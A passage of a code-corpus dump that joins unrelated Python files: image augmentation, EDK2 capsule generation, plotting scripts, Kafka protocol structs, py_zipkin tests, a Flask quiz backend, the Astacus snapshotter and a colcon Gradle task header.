rotated = cv2.warpAffine(image, M, (w, h),borderMode=cv2.BORDER_REPLICATE)
return rotated
def cut_25_under(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_height = int((1-ratio)*height)
img_ = img[:new_height,:,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def cut_25_above(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_height = int(ratio*height)
img_ = img[new_height:,:,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def cut_25_right(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_width = int((1-ratio)*width)
img_ = img[:,:new_width,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def cut_25_left(img,level=0.25):
ratio = level
height,width,_ = img.shape
new_width = int(ratio*width)
img_ = img[:,new_width:,:]
height,width,_ = img_.shape
if height > width :
img2 = np.pad(img_,[[0,0],[(height-width)//2,(height-width)//2],[0,0]],mode='constant',constant_values=255)
else:
img2 = np.pad(img_,[[(width-height)//2,(width-height)//2],[0,0],[0,0]],mode='constant',constant_values=255)
img2 = cv2.resize(img2,(224,224))
return img2
def __call__(self,img):
augmenters = random.choices(self.policy, k=self.num_layers)
for augmenter in augmenters:
level = random.random()
# try:
min_arg,max_arg = self.ARGS_LIMIT[augmenter]
level = min_arg + (max_arg - min_arg) * level
img = self.AUGMENT_FUNCTION[augmenter](img,level=level)
# except:
# print(augmenter)
return img
def augmentation_test():
img_org = cv2.imread('test.jpg')
import yaml
augment_params = yaml.safe_load(open('config/default/train_config.yaml')).get('augment_params')
augmenter = RandAugment(augment_params=augment_params)#(num_layers=1)
for _ in range(10000):
img_aug = augmenter(img_org)
img_pad = preprocess(img_aug,224)
# cv2.imshow('a',img_org)
# cv2.imshow('b',img_aug)
# cv2.imshow('c',img_pad)
# if cv2.waitKey(0)==ord('q'):
# exit()
if __name__ =='__main__':
augmentation_test() | 2.640625 | 3 |
BaseTools/Source/Python/GenFds/CapsuleData.py | James992927108/uEFI_Edk2_Practice | 6 | 3491 | ## @file
# generate capsule
#
# Copyright (c) 2007-2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Ffs
from GenFdsGlobalVariable import GenFdsGlobalVariable
import StringIO
from struct import pack
import os
from Common.Misc import SaveFileOnChange
import uuid
## base class for capsule data
#
#
class CapsuleData:
## The constructor
#
# @param self The object pointer
def __init__(self):
pass
## generate capsule data
#
# @param self The object pointer
def GenCapsuleSubItem(self):
pass
## FFS class for capsule data
#
#
class CapsuleFfs (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
## generate FFS capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
FfsFile = self.Ffs.GenFfs()
return FfsFile
## FV class for capsule data
#
#
class CapsuleFv (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
self.CapsuleName = None
## generate FV capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FvName.find('.fv') == -1:
if self.FvName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys():
FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict.get(self.FvName.upper())
FdBuffer = StringIO.StringIO('')
FvObj.CapsuleName = self.CapsuleName
FvFile = FvObj.AddToBuffer(FdBuffer)
FvObj.CapsuleName = None
FdBuffer.close()
return FvFile
else:
FvFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FvName)
return FvFile
## FD class for capsule data
#
#
class CapsuleFd (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FdName = None
self.CapsuleName = None
## generate FD capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FdName.find('.fd') == -1:
if self.FdName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys():
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict.get(self.FdName.upper())
FdFile = FdObj.GenFd()
return FdFile
else:
FdFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FdName)
return FdFile
## AnyFile class for capsule data
#
#
class CapsuleAnyFile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate AnyFile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
## Afile class for capsule data
#
#
class CapsuleAfile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate Afile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
class CapsulePayload(CapsuleData):
'''Generate payload file, the header is defined below:
#pragma pack(1)
typedef struct {
UINT32 Version;
EFI_GUID UpdateImageTypeId;
UINT8 UpdateImageIndex;
UINT8 reserved_bytes[3];
UINT32 UpdateImageSize;
UINT32 UpdateVendorCodeSize;
UINT64 UpdateHardwareInstance; //Introduced in v2
} EFI_FIRMWARE_MANAGEMENT_CAPSULE_IMAGE_HEADER;
'''
def __init__(self):
self.UiName = None
self.Version = None
self.ImageTypeId = None
self.ImageIndex = None
self.HardwareInstance = None
self.ImageFile = []
self.VendorCodeFile = []
self.Certificate_Guid = None
self.MonotonicCount = None
self.Existed = False
self.Buffer = None
def GenCapsuleSubItem(self, AuthData=[]):
if not self.Version:
self.Version = '0x00000002'
if not self.ImageIndex:
self.ImageIndex = '0x1'
if not self.HardwareInstance:
self.HardwareInstance = '0x0'
ImageFileSize = os.path.getsize(self.ImageFile)
if AuthData:
# the ImageFileSize need include the full authenticated info size. From first bytes of MonotonicCount to last bytes of certificate.
# the 32 bit is the MonotonicCount, dwLength, wRevision, wCertificateType and CertType
ImageFileSize += 32
VendorFileSize = 0
if self.VendorCodeFile:
VendorFileSize = os.path.getsize(self.VendorCodeFile)
#
# Fill structure
#
Guid = self.ImageTypeId.split('-')
Buffer = pack('=ILHHBBBBBBBBBBBBIIQ',
int(self.Version,16),
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16),
int(self.ImageIndex, 16),
0,
0,
0,
ImageFileSize,
VendorFileSize,
int(self.HardwareInstance, 16)
)
if AuthData:
Buffer += pack('QIHH', AuthData[0], AuthData[1], AuthData[2], AuthData[3])
Buffer += uuid.UUID(AuthData[4]).get_bytes_le()
#
# Append file content to the structure
#
ImageFile = open(self.ImageFile, 'rb')
Buffer += ImageFile.read()
ImageFile.close()
if self.VendorCodeFile:
VendorFile = open(self.VendorCodeFile, 'rb')
Buffer += VendorFile.read()
VendorFile.close()
self.Existed = True
return Buffer
| 2.25 | 2 |
CalculatingPi/pi_linear_plot.py | davidmallasen/Hello_MPI | 0 | 3492 | import matplotlib.pyplot as plt
import numpy as np
# Read data
size = []
time = []
with open("pi_linear.txt") as file:
for line in file.readlines():
x, y = line.split(',')
size.append(int(x.strip()))
time.append(float(y.strip()))
# Plot data
fig, ax = plt.subplots()
ax.plot(size, time)
ax.set(xlabel='Num. processes', ylabel='Time (s)',
title='Pi linear')
#ax.grid()
fig.savefig("pi_linear.png")
plt.show()
| 2.953125 | 3 |
esque_wire/protocol/structs/api/elect_preferred_leaders_response.py | real-digital/esque-wire | 0 | 3493 | <gh_stars>0
from typing import ClassVar, List, Optional
from ...constants import ApiKey, ErrorCode
from ..base import ResponseData
class PartitionResult:
partition_id: int
error_code: ErrorCode
error_message: Optional[str]
def __init__(self, partition_id: int, error_code: ErrorCode, error_message: Optional[str]):
"""
:param partition_id: The partition id
:type partition_id: int
:param error_code: The result error, or zero if there was no error.
:type error_code: ErrorCode
:param error_message: The result message, or null if there was no error.
:type error_message: Optional[str]
"""
self.partition_id = partition_id
self.error_code = error_code
self.error_message = error_message
class ReplicaElectionResult:
topic: str
partition_result: List[PartitionResult]
def __init__(self, topic: str, partition_result: List[PartitionResult]):
"""
:param topic: The topic name
:type topic: str
:param partition_result: The results for each partition
:type partition_result: List[PartitionResult]
"""
self.topic = topic
self.partition_result = partition_result
class ElectPreferredLeadersResponseData(ResponseData):
throttle_time_ms: int
replica_election_results: List[ReplicaElectionResult]
api_key: ClassVar[ApiKey] = ApiKey.ELECT_PREFERRED_LEADERS
def __init__(self, throttle_time_ms: int, replica_election_results: List[ReplicaElectionResult]):
"""
:param throttle_time_ms: The duration in milliseconds for which the request was throttled due to a quota
violation, or zero if the request did not violate any quota.
:type throttle_time_ms: int
:param replica_election_results: The election results, or an empty array if the requester did not have
permission and the request asks for all partitions.
:type replica_election_results: List[ReplicaElectionResult]
"""
self.throttle_time_ms = throttle_time_ms
self.replica_election_results = replica_election_results
| 2.359375 | 2 |
tests/stack_test.py | arthurlogilab/py_zipkin | 225 | 3494 | import mock
import pytest
import py_zipkin.storage
@pytest.fixture(autouse=True, scope="module")
def create_zipkin_attrs():
# The following tests all expect _thread_local.zipkin_attrs to exist: if it
# doesn't, mock.patch will fail.
py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_returns_none_if_no_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().get()
assert not py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_none_if_no_zipkin_attrs():
with mock.patch.object(py_zipkin.storage.log, "warning", autospec=True) as log:
assert not py_zipkin.storage.Stack([]).get()
assert log.call_count == 1
def test_storage_stack_still_works_if_you_dont_pass_in_storage():
# Let's make sure this still works if we don't pass in a custom storage.
assert not py_zipkin.storage.Stack().get()
def test_get_zipkin_attrs_returns_the_last_of_the_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_the_last_of_the_list():
assert "foo" == py_zipkin.storage.Stack(["bar", "foo"]).get()
def test_pop_zipkin_attrs_does_nothing_if_no_requests():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().pop()
def test_pop_zipkin_attrs_with_context_does_nothing_if_no_requests():
assert not py_zipkin.storage.Stack([]).pop()
def test_pop_zipkin_attrs_removes_the_last_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo", "bar"]):
assert "bar" == py_zipkin.storage.ThreadLocalStack().pop()
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_pop_zipkin_attrs_with_context_removes_the_last_zipkin_attrs():
context_stack = py_zipkin.storage.Stack(["foo", "bar"])
assert "bar" == context_stack.pop()
assert "foo" == context_stack.get()
def test_push_zipkin_attrs_adds_new_zipkin_attrs_to_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
py_zipkin.storage.ThreadLocalStack().push("bar")
assert "bar" == py_zipkin.storage.ThreadLocalStack().get()
def test_push_zipkin_attrs_with_context_adds_new_zipkin_attrs_to_list():
stack = py_zipkin.storage.Stack(["foo"])
assert "foo" == stack.get()
stack.push("bar")
assert "bar" == stack.get()
def test_stack_copy():
stack = py_zipkin.storage.Stack()
stack.push("a")
stack.push("b")
the_copy = stack.copy()
the_copy.push("c")
stack.push("d")
assert ["a", "b", "c"] == the_copy._storage
assert ["a", "b", "d"] == stack._storage
| 2.109375 | 2 |
myapp/processes/plotter.py | cp4cds/cp4cds-wps-template | 0 | 3495 |
from pywps import Process, LiteralInput, ComplexInput, ComplexOutput
from pywps import Format
import logging
LOGGER = logging.getLogger('PYWPS')
import matplotlib
# no X11 server ... must be run first
# https://github.com/matplotlib/matplotlib/issues/3466/
matplotlib.use('Agg')
import matplotlib.pylab as plt
import cartopy.crs as ccrs
from netCDF4 import Dataset
AIR_DS = 'https://www.esrl.noaa.gov/psd/thredds/fileServer/Datasets/ncep.reanalysis.derived/surface/air.mon.ltm.nc'
def simple_plot(resource, variable=None, output=None):
output = output or 'plot.png'
ds = Dataset(resource)
values = ds.variables[variable]
fig = plt.figure(figsize=(20, 10))
ax = plt.axes(projection=ccrs.PlateCarree())
plt.contourf(values[0, :, :])
ax.stock_img()
ax.coastlines()
plt.colorbar()
fig.savefig(output)
plt.close()
return output
class SimplePlot(Process):
def __init__(self):
inputs = [
ComplexInput('dataset', 'Dataset', supported_formats=[Format('application/x-netcdf')],
default=AIR_DS,
abstract='Example: {0}'.format(AIR_DS)),
LiteralInput('variable', 'Variable', data_type='string',
default='air',
abstract='Please enter the variable name to be plotted, example: air'),
]
outputs = [
ComplexOutput('output', 'Simple Plot', supported_formats=[Format('image/png')],
as_reference=True),
]
super(SimplePlot, self).__init__(
self._handler,
identifier='simple_plot',
title='Simple Plot',
abstract='Returns a nice and simple plot.',
version='1.0',
inputs=inputs,
outputs=outputs,
store_supported=True,
status_supported=True
)
def _handler(self, request, response):
variable = request.inputs['variable'][0].data
output = simple_plot(
resource=request.inputs['dataset'][0].file,
variable=variable)
LOGGER.info("produced output: %s", output)
response.outputs['output'].file = output
response.update_status("simple_plot done", 100)
return response
| 2.328125 | 2 |
json_schema_checker/composed/__init__.py | zorgulle/json_schema_checker | 0 | 3496 | <filename>json_schema_checker/composed/__init__.py<gh_stars>0
from .composed import List
from .composed import IntList | 1.234375 | 1 |
backend/social_quiz.py | jmigual/socialQuiz | 0 | 3497 | # -*- coding: utf-8 -*-
import json
import os.path
import random
import re
from flask import Flask, send_from_directory
from flask import request, abort
from flaskrun.flaskrun import flask_run
import datab.social_database as db
app = Flask(__name__)
# Regular expression to only accept certain files
fileChecker = re.compile(r"(.*\.js|.*\.html|.*\.png|.*\.css|.*\.map)$")
numberOfAnswers = 4
random.seed(7)
def root_dir(): # pragma: no cover
return os.path.abspath(os.path.dirname(__file__))
@app.route('/')
def root():
return index("index2.html")
@app.route('/<path:filename>')
def index(filename):
if fileChecker.match(filename):
return send_from_directory(os.path.join(root_dir(), 'static'), filename)
abort(403)
@app.route('/register')
def register():
# To obtain the mail
email = request.args.get('email')
print(email)
if email is None:
return json.dumps({})
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/join_room')
def join_room():
room_id = request.args.get('room_id')
email = request.args.get('email')
user_id = db.register_or_get_email(email)
db.exec_query("REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)", [room_id, user_id])
return json.dumps({"id": user_id})
@app.route('/answered_room')
def answered_room():
room_id = request.args.get('room_id')
user_id = request.args.get('user_id')
values = db.exec_query("SELECT a.id "
"FROM answer a INNER JOIN question q "
"WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s",
[room_id, user_id])
return json.dumps({"answered": len(values) > 0})
@app.route('/get_user_id')
def get_user_id():
email = request.args.get('email')
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/create_room')
def create_room():
user_id = request.args.get('user_id')
room_id = db.exec_query("INSERT INTO room (creator) VALUES (%s)", [user_id])
return json.dumps({"id": room_id})
@app.route('/get_rooms')
def get_rooms():
user_id = request.args.get('user_id')
values = db.exec_query("SELECT r.id, r.status FROM room r WHERE r.creator=%s", [user_id])
response = []
for val in values:
response.append({"id": val[0], "status": val[1]})
return json.dumps(response)
@app.route('/fill_room', methods=['POST'])
def fill_room():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"})
else:
room_id = json_data["room_id"]
questions = json_data["question"]
for q in questions:
db.exec_query("INSERT INTO question (room_id, question) VALUES (%s, %s)", [room_id, q])
return json.dumps({"info": "Data received"})
@app.route('/open_room')
def open_room():
room_id = request.args.get('room_id')
print(room_id)
db.exec_query("UPDATE room r SET r.status='started' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been opened successfully", "status": "started"})
@app.route('/close_room')
def close_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='closed' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been closed successfully", "status": "closed"})
@app.route('/finish_room')
def finish_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='finished' WHERE r.id = %s", [room_id])
# for
# SELECT id, COUNT(a.id), COUNT(a.id) FROM Room r INNER JOIN
values = db.exec_query("SELECT u.email , COUNT(qq.id) "
"FROM quiz_question qq "
"INNER JOIN users u ON (qq.asked_user_id = u.id) "
"INNER JOIN room_members rm ON (u.id = rm.user_id) "
"WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s "
"GROUP BY u.email "
"ORDER BY COUNT(qq.id) DESC",
[room_id])
ranking = []
for row in values:
ranking.append({"email": row[0], "correct": row[1]})
return json.dumps({"ranking": ranking})
@app.route('/room_status')
def status_room():
room_id = request.args.get('room_id')
# SELECT status FROM Room WHERE id = 1
values = db.exec_query("SELECT status FROM room WHERE id = %s", [room_id])
return json.dumps({
"status": values[0][0]
})
@app.route('/get_room_questions')
def get_room_question():
room_id = request.args.get('room_id')
values = db.exec_query("SELECT id, question FROM question WHERE room_id = %s", [room_id])
response = []
for val in values:
response.append({"id": val[0], "text": val[1]})
return json.dumps({"questions": response})
@app.route('/post_room_answers', methods=['POST'])
def post_room_answers():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"}), 404
user_id = json_data["user_id"]
values = []
for a in json_data["answers"]:
values.append((a["id"], user_id, a["text"]))
print(values[len(values) - 1])
db.exec_many_query("INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)", values)
return json.dumps({"info": "Data received"})
@app.route('/get_quiz_question')
def get_question():
room_id = int(request.args.get('room_id'))
user_id = int(request.args.get('user_id'))
possible_questions = db.get_non_answered_questions(room_id, user_id)
possible_users_to_ask = db.get_non_answered_people(room_id, user_id)
question_id = []
asked_about_id = []
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
else:
possible_questions = db.get_all_questions(room_id)
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
if len(possible_users_to_ask) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
else:
possible_users_to_ask = db.get_all_different_people(room_id, user_id)
if len(possible_questions) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
if len(question_id) > 0 and 0 < len(asked_about_id):
quiz_question_id = db.insert_quiz_question(user_id, asked_about_id[0], question_id[0])
other_users = db.get_all_different_people(room_id, asked_about_id[0])
random.shuffle(other_users)
answers = []
(answer_id, text_id) = db.get_answer(question_id[0], asked_about_id[0])
db.exec_query("UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s", [answer_id, quiz_question_id])
answers.append((answer_id, text_id))
if min(numberOfAnswers - 1, len(other_users)) > 0:
for i in range(min(numberOfAnswers - 1, len(other_users))):
(answer_id, text_id) = db.get_answer(question_id[0], other_users[i])
answers.append((answer_id, text_id))
# if commented the first answer will be the correct one
random.shuffle(answers)
answer_json = []
for (answer_id, text_id) in answers:
answer_json.append({"id": answer_id, "text": text_id})
print(quiz_question_id)
# SELECT 'question' FROM 'Question' WHERE 'id' = 3
value = db.exec_query("SELECT id "
"FROM quiz_question "
"WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s",
[user_id, asked_about_id[0], question_id[0]])
quiz_question_id = value[0][0]
value = db.exec_query("SELECT q.question "
"FROM question q "
"WHERE q.id = %s",
[question_id[0]])
question_text = value[0][0]
value = db.exec_query("SELECT u.email "
"FROM users u "
"WHERE u.id=%s",
[asked_about_id[0]])
user_name = value[0][0]
question_text = "What did %s answer to '%s' ?" % (user_name, question_text)
return json.dumps({
"id": quiz_question_id,
"question": question_text,
"answers": answer_json
})
else:
return json.dumps({"error": "Not available questions for this user in this room"})
@app.route('/post_quiz_answer')
def post_answer():
quiz_question_id = request.args.get('quiz_question_id')
quiz_answer_id = request.args.get('quiz_answer_id')
db.exec_query("UPDATE quiz_question SET answered_id = %s WHERE id = %s", [quiz_answer_id, quiz_question_id])
value = db.exec_query("SELECT qq.answered_id, qq.correct_answer_id, qq.question_id "
"FROM quiz_question qq "
"WHERE qq.id = %s", [quiz_question_id])
answered_id = value[0][0]
correct_answer_id = value[0][1]
question_id = value[0][2]
value = db.exec_query("SELECT a.answer FROM answer a WHERE a.id = %s ", [correct_answer_id])
if len(value) > 0:
text = value[0][0]
else:
text = "something when wrong"
if value is None:
return json.dumps({"error": "Internal server error"})
return json.dumps({
"correct": answered_id == correct_answer_id,
"question": question_id,
"correct_answer": {"id": correct_answer_id, "text": text}
})
if __name__ == '__main__':
flask_run(app)
| 2.578125 | 3 |
astacus/node/snapshotter.py | aiven/astacus | 19 | 3498 | """
Copyright (c) 2020 Aiven Ltd
See LICENSE for details
"""
from astacus.common import magic, utils
from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState
from astacus.common.progress import increase_worth_reporting, Progress
from pathlib import Path
from typing import Optional
import base64
import hashlib
import logging
import os
import threading
logger = logging.getLogger(__name__)
_hash = hashlib.blake2s
def hash_hexdigest_readable(f, *, read_buffer=1_000_000):
h = _hash()
while True:
data = f.read(read_buffer)
if not data:
break
h.update(data)
return h.hexdigest()
class Snapshotter:
"""Snapshotter keeps track of files on disk, and their hashes.
The hash on disk MAY change, which may require subsequent
incremential snapshot and-or ignoring the files which have changed.
The output to outside is just root object's hash, as well as list
of other hashes which correspond to files referred to within the
file list contained in root object.
Note that any call to public API MUST be made with
snapshotter.lock held. This is because Snapshotter is process-wide
utility that is shared across operations, possibly used from
multiple threads, and the single-operation-only mode of operation
is not exactly flawless (the 'new operation can be started with
old running' is intentional feature but new operation should
eventually replace the old). The lock itself might not need to be
built-in to Snapshotter, but having it there enables asserting its
state during public API calls.
"""
def __init__(self, *, src, dst, globs, parallel):
assert globs # model has empty; either plugin or configuration must supply them
self.src = Path(src)
self.dst = Path(dst)
self.globs = globs
self.relative_path_to_snapshotfile = {}
self.hexdigest_to_snapshotfiles = {}
self.parallel = parallel
self.lock = threading.Lock()
def _list_files(self, basepath: Path):
result_files = set()
for glob in self.globs:
for path in basepath.glob(glob):
if not path.is_file() or path.is_symlink():
continue
relpath = path.relative_to(basepath)
for parent in relpath.parents:
if parent.name == magic.ASTACUS_TMPDIR:
break
else:
result_files.add(relpath)
return sorted(result_files)
def _list_dirs_and_files(self, basepath: Path):
files = self._list_files(basepath)
dirs = {p.parent for p in files}
return sorted(dirs), files
def _add_snapshotfile(self, snapshotfile: SnapshotFile):
old_snapshotfile = self.relative_path_to_snapshotfile.get(snapshotfile.relative_path, None)
if old_snapshotfile:
self._remove_snapshotfile(old_snapshotfile)
self.relative_path_to_snapshotfile[snapshotfile.relative_path] = snapshotfile
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles.setdefault(snapshotfile.hexdigest, []).append(snapshotfile)
def _remove_snapshotfile(self, snapshotfile: SnapshotFile):
assert self.relative_path_to_snapshotfile[snapshotfile.relative_path] == snapshotfile
del self.relative_path_to_snapshotfile[snapshotfile.relative_path]
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles[snapshotfile.hexdigest].remove(snapshotfile)
def _snapshotfile_from_path(self, relative_path):
src_path = self.src / relative_path
st = src_path.stat()
return SnapshotFile(relative_path=relative_path, mtime_ns=st.st_mtime_ns, file_size=st.st_size)
def _get_snapshot_hash_list(self, relative_paths):
same = 0
lost = 0
for relative_path in relative_paths:
old_snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
try:
snapshotfile = self._snapshotfile_from_path(relative_path)
except FileNotFoundError:
lost += 1
if increase_worth_reporting(lost):
logger.debug("#%d. lost - %s disappeared before stat, ignoring", lost, self.src / relative_path)
continue
if old_snapshotfile:
snapshotfile.hexdigest = old_snapshotfile.hexdigest
snapshotfile.content_b64 = old_snapshotfile.content_b64
if old_snapshotfile == snapshotfile:
same += 1
if increase_worth_reporting(same):
logger.debug("#%d. same - %r in %s is same", same, old_snapshotfile, relative_path)
continue
yield snapshotfile
def get_snapshot_hashes(self):
assert self.lock.locked()
return [
SnapshotHash(hexdigest=dig, size=sf[0].file_size) for dig, sf in self.hexdigest_to_snapshotfiles.items() if sf
]
def get_snapshot_state(self):
assert self.lock.locked()
return SnapshotState(root_globs=self.globs, files=sorted(self.relative_path_to_snapshotfile.values()))
def _snapshot_create_missing_directories(self, *, src_dirs, dst_dirs):
changes = 0
for i, relative_dir in enumerate(set(src_dirs).difference(dst_dirs), 1):
dst_path = self.dst / relative_dir
dst_path.mkdir(parents=True, exist_ok=True)
if increase_worth_reporting(i):
logger.debug("#%d. new directory: %r", i, relative_dir)
changes += 1
return changes
def _snapshot_remove_extra_files(self, *, src_files, dst_files):
changes = 0
for i, relative_path in enumerate(set(dst_files).difference(src_files), 1):
dst_path = self.dst / relative_path
snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
if snapshotfile:
self._remove_snapshotfile(snapshotfile)
dst_path.unlink()
if increase_worth_reporting(i):
logger.debug("#%d. extra file: %r", i, relative_path)
changes += 1
return changes
def _snapshot_add_missing_files(self, *, src_files, dst_files):
existing = 0
disappeared = 0
changes = 0
for i, relative_path in enumerate(set(src_files).difference(dst_files), 1):
src_path = self.src / relative_path
dst_path = self.dst / relative_path
try:
os.link(src=src_path, dst=dst_path, follow_symlinks=False)
except FileExistsError:
# This happens only if snapshot is started twice at
# same time. While it is technically speaking upstream
# error, we rather handle it here than leave
# exceptions not handled.
existing += 1
if increase_worth_reporting(existing):
logger.debug("#%d. %s already existed, ignoring", existing, src_path)
continue
except FileNotFoundError:
disappeared += 1
if increase_worth_reporting(disappeared):
logger.debug("#%d. %s disappeared before linking, ignoring", disappeared, src_path)
continue
if increase_worth_reporting(i - disappeared):
logger.debug("#%d. new file: %r", i - disappeared, relative_path)
changes += 1
return changes
def snapshot(self, *, progress: Optional[Progress] = None):
assert self.lock.locked()
if progress is None:
progress = Progress()
src_dirs, src_files = self._list_dirs_and_files(self.src)
progress.start(1)
if self.src == self.dst:
# The src=dst mode should be used if and only if it is
# known that files will not disappear between snapshot and
# upload steps (e.g. Astacus controls the lifecycle of the
# files within). In that case, there is little point in
# making extra symlinks and we can just use the src
# directory contents as-is.
dst_dirs, dst_files = src_dirs, src_files
else:
progress.add_total(3)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
# Create missing directories
changes = self._snapshot_create_missing_directories(src_dirs=src_dirs, dst_dirs=dst_dirs)
progress.add_success()
# Remove extra files
changes += self._snapshot_remove_extra_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# Add missing files
changes += self._snapshot_add_missing_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# We COULD also remove extra directories, but it is not
# probably really worth it and due to ignored files it
# actually might not even work.
# Then, create/update corresponding snapshotfile objects (old
# ones were already removed)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
snapshotfiles = list(self._get_snapshot_hash_list(dst_files))
progress.add_total(len(snapshotfiles))
def _cb(snapshotfile):
# src may or may not be present; dst is present as it is in snapshot
with snapshotfile.open_for_reading(self.dst) as f:
if snapshotfile.file_size <= magic.EMBEDDED_FILE_SIZE:
snapshotfile.content_b64 = base64.b64encode(f.read()).decode()
else:
snapshotfile.hexdigest = hash_hexdigest_readable(f)
return snapshotfile
def _result_cb(*, map_in, map_out):
self._add_snapshotfile(map_out)
progress.add_success()
return True
changes += len(snapshotfiles)
utils.parallel_map_to(iterable=snapshotfiles, fun=_cb, result_callback=_result_cb, n=self.parallel)
# We initially started with 1 extra
progress.add_success()
return changes
| 2.328125 | 2 |
colcon_gradle/task/gradle/build.py | richiware/colcon-gradle | 0 | 3499 | <filename>colcon_gradle/task/gradle/build.py<gh_stars>0
# Copyright 2018 <NAME>
# Licensed under the Apache License, Version 2.0
from distutils import dir_util
import glob
import os
from pathlib import Path
import shutil
from colcon_core.environment import create_environment_scripts
from colcon_core.logging import colcon_logger
from colcon_core.plugin_system import satisfies_version
from colcon_core.shell import create_environment_hook
from colcon_core.shell import get_command_environment
from colcon_core.task import run
from colcon_core.task import TaskExtensionPoint
from colcon_gradle.task.gradle import get_wrapper_executable
from colcon_gradle.task.gradle import GRADLE_EXECUTABLE
from colcon_gradle.task.gradle import has_wrapper_executable
logger = colcon_logger.getChild(__name__)
